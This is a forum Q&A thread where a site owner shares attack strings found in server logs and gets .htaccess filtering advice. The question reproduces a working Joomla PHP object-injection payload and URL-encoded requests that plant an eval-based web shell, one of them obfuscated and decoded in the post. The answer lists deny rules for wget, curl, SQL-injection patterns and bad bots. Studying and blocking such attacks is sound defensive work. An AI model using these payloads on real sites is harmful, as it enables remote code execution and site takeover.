I found this in my error logs, a hack attempt?

Asked

Viewed 110 times

0

I found this in my error logs and security search, yet I’ll study, but maybe someone has seen?

1 attempt

The codes were captured from a connection and taken from PHP’s GLOBAL $_SERVER with the values in the HTTP_USER_AGENT and HTTP_REFERER indexes :

the following code was received as user-agent:

}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:46:"eval($_REQUEST[1]);JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";b:1;}?

the following code was received as user-referer:

/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B

ip: 178.219.243.167

178.219.243.167 AU Sevastopol, Sebastopol City, Ukraine, Europe 90022 44.5888, 33.5224 500 Scientific-Industrial Enterprise Myst LLC Scientific-Industrial Enterprise Myst LLC sevstar.net


2 try just now

the following code was received as user-referer:

/?fbclid=IwAR3x4bqG8uS4DfqYdfahS2CSxkAoWFuEn2kmUlysYXaeV7tx77x1Ip4zglo

ip: 31.13.115.14

31.13.115.14 US United States, North America 37,751, -97.822 1000 Facebook Ireland Ltd Facebook


3 try now at 21:48

the following code was received as user-referer:

__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:46:"eval($_REQUEST[1]);JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}?

the following code was received as user-referer:

/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD8kX3VVPWNocig5OSkuY2hyKDEwNCkuY2hyKDExNCk7JF9jQz0kX3VVKDEwMSkuJF91VSgxMTgpLiRfdVUoOTcpLiRfdVUoMTA4KS4kX3VVKDQwKS4kX3VVKDM2KS4kX3VVKDk1KS4kX3VVKDgwKS4kX3VVKDc5KS4kX3VVKDgzKS4kX3VVKDg0KS4kX3VVKDkxKS4kX3VVKDQ5KS4kX3VVKDkzKS4kX3VVKDQxKS4kX3VVKDU5KTskX2ZGPSRfdVUoOTkpLiRfdVUoMTE0KS4kX3VVKDEwMSkuJF91VSg5NykuJF91VSgxMTYpLiRfdVUoMTAxKS4kX3VVKDk1KS4kX3VVKDEwMikuJF91VSgxMTcpLiRfdVUoMTEwKS4kX3VVKDk5KS4kX3VVKDExNikuJF91VSgxMDUpLiRfdVUoMTExKS4kX3VVKDExMCk7JF89JF9mRigiIiwkX2NDKTtAJF8oKTs/Pg%3D%3D%27%29%29%3Becho%20%27%7C%3C-%27%3B

Deciphering the value coming in BASE64 the result is as follows:

<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?>

I have no idea what this php script above does!

ip: 142.93.52.63

142.93.52.63 US North Bergen, New Jersey, United States, North America 07047 40,793, -74.0247 1000 Digital Ocean Digital Ocean 501


I will not block the ip for search reasons...

What would be the best steps to take for these ips?


From the research I’ve done, this attack works on the platforms they use Joomla, tip for those who use!

Please help keep the internet a safe place! = D

  • 1

    That IP is currently from the city of Sevastopol in Ukraine, then probably yes. Imagnino that does not have many users accessing its application from europe

  • @Costamilam this, I did a geoip search to identify and saved the data to take the necessary steps.

  • 1

    Assuming you have htaccess enabled in your hosting, it could make a filter for user-Agents and sqlmap as well, so it does not protect 100% but avoids many other problems with unoccupied.

  • @Eliseub. I have filter and . htaccess yes, sql filter and a check of char by char, I believe it will have to try a lot yet and the system ta in test, should be boot.

  • 1

    That one ip 178.219.243.167 is an anonymous proxy 178.219.243.167, 61746, UA, Ukraine, Socks4, Anonymous, Yes, 1 minute ago.

  • @Augustovasques good bro, did not know, so no use blocking, that’s it?

  • I discovered some things of this Racker, [email protected], in this link with even Ttack made here.. https://security.stackexchange.com/questions/117433/i-think-my-site-was-hacked-cansomeone-explain-the-get-http-1-0-garbage-in, tries to load 4 files from this link too, Pastebin.com/raw/vdU1gPBk... had to catch a guy from this =D

Show 2 more comments

1 answer

-1

As it is not possible to post this in the comment, it follows a list of htaccess that may add something to your service.

##### Block directory browsing  -- END
##########################################
##### Redirect Linux Programs/Commands Used By Hackers and Spammers To Honeypot -- START
RewriteCond %{REQUEST_URI} !honeypot.php/
RewriteCond %{HTTP_USER_AGENT} ^.*Wget* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*curl* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*apache* [NC]
RewriteRule ^(.*)$ /honeypot.php/ [NC,L]
##### Redirect Linux Programs/Commands Used By Hackers and Spammers To Honeypot -- END
##########################################
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2})
############################################################################
############################## CACHE DE ARQUIVOS
#Força a utilizar Cache-Control e Expires header
########## Begin - File injection protection, by SigSiu.net
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule .* - [F]
########## End - File injection protection
########## Begin - Basic antispam Filter, by SigSiu.net
## I removed some common words, tweak to your liking
## This code uses PCRE and works only with Apache 2.x.
## This code will NOT work with Apache 1.x servers.
RewriteCond %{QUERY_STRING} \b(ambien|blue\spill|cialis|cocaine|ejaculation|erectile)\b [NC,OR]
RewriteCond %{QUERY_STRING} \b(erections|hoodia|huronriveracres|impotence|levitra|libido)\b [NC,OR]
RewriteCond %{QUERY_STRING} \b(lipitor|phentermin|pro[sz]ac|sandyauer|tramadol|troyhamby)\b [NC,OR]
RewriteCond %{QUERY_STRING} \b(ultram|unicauca|valium|viagra|vicodin|xanax|ypxaieo)\b [NC]
## Note: The final RewriteCond must NOT use the [OR] flag.
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule .* - [F]
## Note: The previous lines are a "compressed" version
## of the filters. You can add your own filters as:
## RewriteCond %{QUERY_STRING} \bbadword\b [NC,OR]
## where "badword" is the word you want to exclude.
########## End - Basic antispam Filter, by SigSiu.net
########## Begin - Advanced server protection - query strings, referrer and config
# Advanced server protection, version 3.2 - May 2011
# by Nicholas K. Dionysopoulos
## Disallow PHP Easter Eggs (can be used in fingerprinting attacks to determine
## your PHP version). See http://www.0php.com/php_easter_egg.php and
## http://osvdb.org/12184 for more information
RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule .* - [F]
## SQLi first line of defense, thanks to Radek Suski (SigSiu.net) @
## http://www.sigsiu.net/presentations/fortifying_your_joomla_website.html
## May cause problems on legitimate requests
RewriteCond %{QUERY_STRING} concat[^\(]*\( [NC,OR]
RewriteCond %{QUERY_STRING} union([^s]*s)+elect [NC,OR]
RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/\.well-known/pki-validation/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule .* - [F]
########## Block bad user agents
## The following list may include bots that no longer exist or are not a problem
## for your site. The list will always be incomplete and it is therefore wise to
## follow discussions on one of the many "security" mailing lists or on a forum
## such as http://www.webmasterworld.com/search_engine_spiders/
## It is also unwise to rely on this list as your ONLY security mechanism.
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:[email protected] [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
## Note: The final RewriteCond must NOT use the [OR] flag.
# Bad bot
SetEnvIfNoCase User-Agent "^abot" bad_bot
SetEnvIfNoCase User-Agent "^aipbot" bad_bot
SetEnvIfNoCase User-Agent "^asterias" bad_bot
SetEnvIfNoCase User-Agent "^EI" bad_bot
SetEnvIfNoCase User-Agent "^libwww-perl" bad_bot
SetEnvIfNoCase User-Agent "^LWP" bad_bot
SetEnvIfNoCase User-Agent "^lwp" bad_bot
SetEnvIfNoCase User-Agent "^MSIECrawler" bad_bot
SetEnvIfNoCase User-Agent "^nameprotect" bad_bot
SetEnvIfNoCase User-Agent "^PlantyNet_WebRobot" bad_bot
SetEnvIfNoCase User-Agent "^UCmore" bad_bot
SetEnvIfNoCase User-Agent "Alligator" bad_bot
SetEnvIfNoCase User-Agent "AllSubmitter" bad_bot
SetEnvIfNoCase User-Agent "Anonymous" bad_bot
SetEnvIfNoCase User-Agent "Asterias" bad_bot
SetEnvIfNoCase User-Agent "autoemailspider" bad_bot
SetEnvIfNoCase User-Agent "Badass" bad_bot
SetEnvIfNoCase User-Agent "Baiduspider" bad_bot
SetEnvIfNoCase User-Agent "BecomeBot" bad_bot
SetEnvIfNoCase User-Agent "Bitacle" bad_bot
SetEnvIfNoCase User-Agent "bladder\ fusion" bad_bot
SetEnvIfNoCase User-Agent "Blogshares\ Spiders" bad_bot
SetEnvIfNoCase User-Agent "Board\ Bot" bad_bot
SetEnvIfNoCase User-Agent "Board\ Bot" bad_bot
SetEnvIfNoCase User-Agent "Convera" bad_bot
SetEnvIfNoCase User-Agent "ConveraMultiMediaCrawler" bad_bot
SetEnvIfNoCase User-Agent "c-spider" bad_bot
SetEnvIfNoCase User-Agent "DA" bad_bot
SetEnvIfNoCase User-Agent "DnloadMage" bad_bot
SetEnvIfNoCase User-Agent "Download\ Demon" bad_bot
SetEnvIfNoCase User-Agent "Download\ Express" bad_bot
SetEnvIfNoCase User-Agent "Download\ Wonder" bad_bot
SetEnvIfNoCase User-Agent "dragonfly" bad_bot
SetEnvIfNoCase User-Agent "DreamPassport" bad_bot
SetEnvIfNoCase User-Agent "DSurf" bad_bot
SetEnvIfNoCase User-Agent "DTS Agent" bad_bot
SetEnvIfNoCase User-Agent "EBrowse" bad_bot
SetEnvIfNoCase User-Agent "eCatch" bad_bot
SetEnvIfNoCase User-Agent "edgeio" bad_bot
SetEnvIfNoCase User-Agent "Email\ Extractor" bad_bot
SetEnvIfNoCase User-Agent "EmailSiphon" bad_bot
SetEnvIfNoCase User-Agent "EmailWolf" bad_bot
SetEnvIfNoCase User-Agent "EmeraldShield" bad_bot
SetEnvIfNoCase User-Agent "ESurf" bad_bot
SetEnvIfNoCase User-Agent "Exabot" bad_bot
SetEnvIfNoCase User-Agent "ExtractorPro" bad_bot
SetEnvIfNoCase User-Agent "FileHeap!\ file downloader" bad_bot
SetEnvIfNoCase User-Agent "FileHound" bad_bot
SetEnvIfNoCase User-Agent "Forex" bad_bot
SetEnvIfNoCase User-Agent "Franklin\ Locator" bad_bot
SetEnvIfNoCase User-Agent "FreshDownload" bad_bot
SetEnvIfNoCase User-Agent "FrontPage" bad_bot
SetEnvIfNoCase User-Agent "FSurf" bad_bot
SetEnvIfNoCase User-Agent "Gaisbot" bad_bot
SetEnvIfNoCase User-Agent "Gamespy_Arcade" bad_bot
SetEnvIfNoCase User-Agent "genieBot" bad_bot
SetEnvIfNoCase User-Agent "GetBot" bad_bot
SetEnvIfNoCase User-Agent "GetRight" bad_bot
SetEnvIfNoCase User-Agent "Gigabot" bad_bot
SetEnvIfNoCase User-Agent "Go!Zilla" bad_bot
SetEnvIfNoCase User-Agent "Go-Ahead-Got-It" bad_bot
SetEnvIfNoCase User-Agent "GOFORITBOT" bad_bot
SetEnvIfNoCase User-Agent "heritrix" bad_bot
SetEnvIfNoCase User-Agent "HLoader" bad_bot
SetEnvIfNoCase User-Agent "HooWWWer" bad_bot
SetEnvIfNoCase User-Agent "HTTrack" bad_bot
SetEnvIfNoCase User-Agent "iCCrawler" bad_bot
SetEnvIfNoCase User-Agent "ichiro" bad_bot
SetEnvIfNoCase User-Agent "iGetter" bad_bot
SetEnvIfNoCase User-Agent "imds_monitor" bad_bot
SetEnvIfNoCase User-Agent "Industry\ Program" bad_bot
SetEnvIfNoCase User-Agent "Indy\ Library" bad_bot
SetEnvIfNoCase User-Agent "InetURL" bad_bot
SetEnvIfNoCase User-Agent "InstallShield\ DigitalWizard" bad_bot
SetEnvIfNoCase User-Agent "IRLbot" bad_bot
SetEnvIfNoCase User-Agent "IUPUI\ Research\ Bot" bad_bot
SetEnvIfNoCase User-Agent "Java" bad_bot
SetEnvIfNoCase User-Agent "jeteye" bad_bot
SetEnvIfNoCase User-Agent "jeteyebot" bad_bot
SetEnvIfNoCase User-Agent "JoBo" bad_bot
SetEnvIfNoCase User-Agent "JOC\ Web\ Spider" bad_bot
SetEnvIfNoCase User-Agent "Kapere" bad_bot
SetEnvIfNoCase User-Agent "Larbin" bad_bot
SetEnvIfNoCase User-Agent "LeechGet" bad_bot
SetEnvIfNoCase User-Agent "LightningDownload" bad_bot
SetEnvIfNoCase User-Agent "Linkie" bad_bot
SetEnvIfNoCase User-Agent "Mac\ Finder" bad_bot
SetEnvIfNoCase User-Agent "Mail\ Sweeper" bad_bot
SetEnvIfNoCase User-Agent "Mass\ Downloader" bad_bot
SetEnvIfNoCase User-Agent "MetaProducts\ Download\ Express" bad_bot
SetEnvIfNoCase User-Agent "Microsoft\ Data\ Access" bad_bot
SetEnvIfNoCase User-Agent "Microsoft\ URL\ Control" bad_bot
SetEnvIfNoCase User-Agent "Missauga\ Locate" bad_bot
SetEnvIfNoCase User-Agent "Missauga\ Locator" bad_bot
SetEnvIfNoCase User-Agent "Missigua Locator" bad_bot
SetEnvIfNoCase User-Agent "Missouri\ College\ Browse" bad_bot
SetEnvIfNoCase User-Agent "Mister\ PiX" bad_bot
SetEnvIfNoCase User-Agent "MovableType" bad_bot
SetEnvIfNoCase User-Agent "Mozi!" bad_bot
SetEnvIfNoCase User-Agent "Mozilla/3.0 (compatible)" bad_bot
SetEnvIfNoCase User-Agent "Mozilla/5.0 (compatible; MSIE 5.0)" bad_bot
SetEnvIfNoCase User-Agent "MSIE_6.0" bad_bot
SetEnvIfNoCase User-Agent "MSIECrawler" badbot
SetEnvIfNoCase User-Agent "MVAClient" bad_bot
SetEnvIfNoCase User-Agent "MyFamilyBot" bad_bot
SetEnvIfNoCase User-Agent "MyGetRight" bad_bot
SetEnvIfNoCase User-Agent "NASA\ Search" bad_bot
SetEnvIfNoCase User-Agent "Naver" bad_bot
SetEnvIfNoCase User-Agent "NaverBot" bad_bot
SetEnvIfNoCase User-Agent "NetAnts" bad_bot
SetEnvIfNoCase User-Agent "NetResearchServer" bad_bot
SetEnvIfNoCase User-Agent "NEWT\ ActiveX" bad_bot
SetEnvIfNoCase User-Agent "Nextopia" bad_bot
SetEnvIfNoCase User-Agent "NICErsPRO" bad_bot
SetEnvIfNoCase User-Agent "NimbleCrawler" bad_bot
SetEnvIfNoCase User-Agent "Nitro\ Downloader" bad_bot
SetEnvIfNoCase User-Agent "Nutch" bad_bot
SetEnvIfNoCase User-Agent "Offline\ Explorer" bad_bot
SetEnvIfNoCase User-Agent "OmniExplorer" bad_bot
SetEnvIfNoCase User-Agent "OutfoxBot" bad_bot
SetEnvIfNoCase User-Agent "P3P" bad_bot
SetEnvIfNoCase User-Agent "PagmIEDownload" bad_bot
SetEnvIfNoCase User-Agent "pavuk" bad_bot
SetEnvIfNoCase User-Agent "PHP\ version" bad_bot
SetEnvIfNoCase User-Agent "playstarmusic" bad_bot
SetEnvIfNoCase User-Agent "Program\ Shareware" bad_bot
SetEnvIfNoCase User-Agent "Progressive Download" bad_bot
SetEnvIfNoCase User-Agent "psycheclone" bad_bot
SetEnvIfNoCase User-Agent "puf" bad_bot
SetEnvIfNoCase User-Agent "PussyCat" bad_bot
SetEnvIfNoCase User-Agent "PuxaRapido" bad_bot
SetEnvIfNoCase User-Agent "Python-urllib" bad_bot
SetEnvIfNoCase User-Agent "RealDownload" bad_bot
SetEnvIfNoCase User-Agent "RedKernel" bad_bot
SetEnvIfNoCase User-Agent "relevantnoise" bad_bot
SetEnvIfNoCase User-Agent "RepoMonkey\ Bait\ &\ Tackle" bad_bot
SetEnvIfNoCase User-Agent "RTG30" bad_bot
SetEnvIfNoCase User-Agent "SBIder" bad_bot
SetEnvIfNoCase User-Agent "script" bad_bot
SetEnvIfNoCase User-Agent "Seekbot" bad_bot
SetEnvIfNoCase User-Agent "SiteSnagger" bad_bot
SetEnvIfNoCase User-Agent "SmartDownload" bad_bot
SetEnvIfNoCase User-Agent "sna-" bad_bot
SetEnvIfNoCase User-Agent "Snap\ bot" bad_bot
SetEnvIfNoCase User-Agent "SpeedDownload" bad_bot
SetEnvIfNoCase User-Agent "Sphere" bad_bot
SetEnvIfNoCase User-Agent "sproose" bad_bot
SetEnvIfNoCase User-Agent "SQ\ Webscanner" bad_bot
SetEnvIfNoCase User-Agent "Stamina" bad_bot
SetEnvIfNoCase User-Agent "Star\ Downloader" bad_bot
SetEnvIfNoCase User-Agent "Teleport" bad_bot
SetEnvIfNoCase User-Agent "TurnitinBot" bad_bot
SetEnvIfNoCase User-Agent "UdmSearch" bad_bot
SetEnvIfNoCase User-Agent "URLGetFile" bad_bot
SetEnvIfNoCase User-Agent "User-Agent" bad_bot
SetEnvIfNoCase User-Agent "UtilMind\ HTTPGet" bad_bot
SetEnvIfNoCase User-Agent "WebAuto" bad_bot
SetEnvIfNoCase User-Agent "WebCapture" bad_bot
SetEnvIfNoCase User-Agent "webcollage" bad_bot
SetEnvIfNoCase User-Agent "WebCopier" bad_bot
SetEnvIfNoCase User-Agent "WebFilter" bad_bot
SetEnvIfNoCase User-Agent "WebReaper" bad_bot
SetEnvIfNoCase User-Agent "Website\ eXtractor" bad_bot
SetEnvIfNoCase User-Agent "WebStripper" bad_bot
SetEnvIfNoCase User-Agent "WebZIP" bad_bot
SetEnvIfNoCase User-Agent "Wells\ Search" bad_bot
SetEnvIfNoCase User-Agent "WEP\ Search\ 00" bad_bot
SetEnvIfNoCase User-Agent "Wget" bad_bot
SetEnvIfNoCase User-Agent "Wildsoft\ Surfer" bad_bot
SetEnvIfNoCase User-Agent "WinHttpRequest" bad_bot
SetEnvIfNoCase User-Agent "WWWOFFLE" bad_bot
SetEnvIfNoCase User-Agent "Xaldon\ WebSpider" bad_bot
SetEnvIfNoCase User-Agent "Y!TunnelPro" bad_bot
SetEnvIfNoCase User-Agent "YahooYSMcm" bad_bot
SetEnvIfNoCase User-Agent "Zade" bad_bot
SetEnvIfNoCase User-Agent "ZBot" bad_bot
SetEnvIfNoCase User-Agent "zerxbot" bad_bot
</IfModule>

# Apache < 2.4
<IfModule !mod_authz_core.c>
    <Limit GET POST>
        Order allow,deny
        Allow from all
        Deny from env=bad_bot
    </Limit>
</IfModule>
# Apache >= 2.4
<IfModule mod_authz_core.c>
    <Limit GET POST>
        <RequireAll>
            Require all granted
            Require not env bad_bot
        </RequireAll>
    </Limit>
</IfModule>
  • I’ll take a look, as soon as I have time to check what might fit in here, thank you!

Browser other questions tagged

You are not signed in. Login or sign up in order to post.